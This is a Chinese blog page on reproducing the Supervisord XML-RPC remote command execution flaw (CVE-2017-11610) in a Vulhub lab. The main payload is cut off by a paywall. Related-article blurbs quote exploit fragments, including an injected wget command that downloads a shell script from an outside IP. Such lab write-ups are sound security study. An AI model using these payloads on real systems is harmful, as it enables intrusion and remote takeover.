Vulhub Supervisord 远程命令执行漏洞复现

SupervisordXML-RPCServer远程命令执行漏洞CVE-2017-11610

最新推荐文章于 2025-09-12 15:23:41 发布

原创

最新推荐文章于 2025-09-12 15:23:41 发布 · 517 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#服务器 #运维 #安全 #网络安全

文章介绍了Supervisord中一个XML-RPC服务器的安全漏洞，该漏洞允许远程攻击者通过特制的XML-RPC请求执行任意命令。受影响的版本包括3.0.1之前、3.1.4之前、3.2.4之前和3.3.3之前的版本。文中提供了漏洞复现的方法，包括使用POC执行命令和通过Metasploit生成shell脚本进行攻击。

漏洞介绍

漏洞简介

Supervisord是一款Python开发的一套进程控制系统，用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。

漏洞编号

CVE-2017-11610

影响版本

3.0.1之前的版本

3.1.4之前的3.1.x版本

3.2.4之前的3.2.x版本

3.3.3之前的3.3.x版本

环境搭建

cd /vulhub/supervisor/CVE-2017-11610

docker-compose up -d

访问靶场IP:9001 验证靶场开启

漏洞复现

方法一

Payload如下：

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: applica

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

xiaolihello8

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境

04-18

本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞的复现环境。将文件下载到本地，直接运行tomcat 启动服务器，地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果，请勿非法使用，仅供学习研究

Typora-远程命令执行漏洞复现-CVE-2023-2317

apple_52661176的博客

08-31

527

Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞，具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件，来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件，或者从一个恶意网页复制文本并将其粘贴到Typora中，那么攻击者可以通过在＜embed＞标签中引用update.html来利用这个漏洞。

参与评论您还未登录，请先登录后发表或查看评论

Supervisord 远程命令执行漏洞（CVE-2017-11610）

m0_49025459的博客

12-13

293

【代码】Supervisord 远程命令执行漏洞（CVE-2017-11610）

vulhub漏洞复现-redis未授权访问getshell总结（CVE-2022-0543）

最新发布

2302_79841575的博客

09-12

822

摘要：本文演示了Redis未授权访问漏洞的利用过程。漏洞影响版本低于6.x，主要由于未配置访问控制和密码认证所致。攻击者通过nmap扫描发现靶机开放6379端口后，使用redis-rogue-getshell工具建立主从复制连接，成功在目标系统执行命令。复现过程包括环境搭建、未授权连接验证和利用主从复制模式实现远程代码执行，展示了该高危漏洞的实际危害。

远程桌面漏洞poc_Supervisord 远程代码执行漏洞（CVE201711610）漏洞复现

weixin_39730263的博客

12-10

222

漏洞信息Supervisord是使用Python 开发的进程管理程序，Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能，在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后，服务器会启动一个XMLRPC服务器，端口号为9001，利用本漏洞，在获取接口访问权限后，远程攻击者可利用发送一段...

python supervisord 远程命令执行漏洞（CVE-2017-11610）

whatday的专栏

06-27

885

Supervisord Supervisord是一款Python开发，用于管理后台应用（服务）的工具，其角色类似于Linux自带的Systemd。我觉得它相比Systemd有几个特点：配置比较简单一个简单的第三方应用，与系统没有耦合提供HTTP API，支持远程操作所以，我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client，Server以一个服务的形式，跑在系统后台，而Client是一个命令行工具，其实就是根据用户的要求，调用Server提供的A

vulhub-CVE-2018-1273远程命令执行漏洞复现

m0_62008601的博客

09-23

1481

Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听，这时候用nc进行监听的话，收不到反弹的shell。发送命令之后返回500说明执行成功，接着我们登录到doker容器看到success文件成功被创建，说明漏洞存在。执行之后如果没成功反弹shell ，可以先执行赋予文件权限的命令。开启监听之后，再修改请求命令，让靶机执行木马文件上线。

Supervisord 远程命令执行漏洞（CVE-2017-11610）漏洞复现

渗透之路，攻防之间皆学问

01-12

4729

目录 Supervisord介绍漏洞介绍漏洞影响版本漏洞复现 poc检测 Supervisord介绍背景：在一个分布式环境中，每台机器上可能需要启动和停止多个进程，使用命令行方式一个一个手动启动和停止非常麻烦，而且查看每个进程的状态也很不方便。如果有一个工具能够实现每台机器上多个进程的简单高效中心化管理将是非常方便的。于是Supervisord工具应运而生。与Supervisord类似的工具包括monit, daemontools和runit。 Supervisord：superv.

CVE-2017-8464远程命令执行漏洞复现

u011215939的博客

12-20

1143

CVE-2017-8464远程命令执行漏洞复现前言 2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危漏洞描述攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用

HFS远程命令执行漏洞复现

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

05-28

6136

漏洞程序下载地址:Http File Server 这里说一下，再Windows server 2003中复现时，我直接使用Administrator用户登录，然后复现，未出现权限问题。再Windows 10中尝试复现时发现权限不足，需要以管理员权限执行漏洞程序。运行程序截图如下尝试访问该软件提供的web服务 web服务是这个样子的，这个web服务的搜索处存在漏洞一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos

vulhub-漏洞复现（Spring Data Rest 远程命令执行漏洞（CVE-2017-8046））

weixin_45095113的博客

12-08

633

vulhub漏洞复现

Webmin远程命令执行漏洞复现

yuan_boss的博客

10-12

1355

详细的来说，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码，该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP，注意user=rootxx这部分，如果写的是user=root，肯定不能成功注入，必须是目标网站的服务器中不存在的用户，否则就会命令执行失败。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。

CVE-2021-32849 Gerapy远程命令执行漏洞复现

include_voidmain的博客

03-09

1379

CVE-2021-32849 Gerapy远程命令执行漏洞复现

Drupal远程命令执行漏洞复现

BerL1n

12-29

1090

time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞，影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞，影响8.x的Drupal Core。漏洞检测针对该漏洞，可采用两种方法进行检测：方法一：登陆Drupal管理后台，查看内核版本是8.x，且版本号低于8.3.4，则存在该漏洞；否则，不存在该漏洞；方法二：在Drupal根目录下找到文件/core/lib/Drupal/Com

【漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞

CS13522431352的博客

08-09

775

Supervisord是一款由Python语言开发，用于管理后台应用（服务）的工具，方便运维人员使用图形化界面进行管理。近期，Supervisord曝出了一个需认证的远程命令执行漏洞（CVE-2017-11610），通过POST请求Supervisord管理界面恶意数据，可以获取服务器操作权限，存在严重的安全风险。

Spring Data Commons远程命令执行漏洞复现（CVE-2018-1273）

wutiangui的博客

09-10

1216

下载文件请求包：username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users，注册，BP抓包。在sh文件所在目录开启http服务。2.开启http服务。

CVE-2019-15107 Webmin远程命令执行漏洞复现

EC_Carrot的博客

03-03

345

漏洞概括 Webmin的是一个用于管理类Unix的系统的管理配置工具，具有网络页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码。影响版本： Webmin <= 1.920 环境搭建自己用docker搭了个1.910版本的Webmin，具体操作… 漏洞的触发需要开启密码重置功能，需要把允许用户使用旧密码设置新密码的选项给选上。登录